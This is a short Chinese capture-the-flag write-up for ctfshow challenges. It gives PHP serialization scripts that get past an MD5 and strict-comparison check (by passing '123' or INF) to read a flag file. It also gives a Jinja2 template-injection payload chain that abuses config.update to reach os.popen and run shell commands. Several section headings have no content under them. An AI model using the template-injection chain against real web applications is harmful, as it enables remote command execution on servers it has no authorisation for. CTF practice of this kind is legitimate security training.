签到·好玩的PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| <?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow {
private $d = '';
private $s = '';
private $b = '';
private $ctf = '';
public function __destruct() {
$this->d = (string)$this->d;
$this->s = (string)$this->s;
$this->b = (string)$this->b;
if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
$dsb = $this->d.$this->s.$this->b;
if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
if (md5($dsb) === md5($this->ctf)) {
echo file_get_contents("/flag.txt");
}
}
}
}
}
}
unserialize($_GET["dsbctf"]);
|
可以直接用123过
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| <?php
class ctfshow {
public $d = '';
public $s = '';
public $b = '';
public $ctf = '';
}
$a=new ctfshow();
$a->ctf=123;
$a->d="1";
$a->s="2";
$a->b="3";
echo urlencode(serialize($a));
|
还有特殊浮点数变量NAN和INF可以来进行
1
2
3
4
5
6
7
8
9
10
11
| <?php
class ctfshow {
private $d = 'I';
private $s = 'N';
private $b = 'F';
private $ctf = INF;
}
$dsbctf = new ctfshow();
echo urlencode(serialize($dsbctf));
|
ez_inject
自己出的
ezzz_ssti
可以利用一个参数,也就是config里面的update进行不断的参数更新来使得绕过字符长度
1
2
3
4
5
6
7
8
| {%set x=config.update(a=config.update)%} //此时字典中a的值被更新为config全局对象中的update方法
{%set x=config.a(f=lipsum.__globals__)%} //f的值被更新为lipsum.__globals__
{%set x=config.a(o=config.f.os)%} //o的值被更新为lipsum.__globals__.os
{%set x=config.a(p=config.o.popen)%} //p的值被更新为lipsum.__globals__.os.popen
{{config.p("ls /").read()}}
{%print(config)%} //输出config字典的所有键值对
{%print(config.o)%} //输出
|
迷雾重重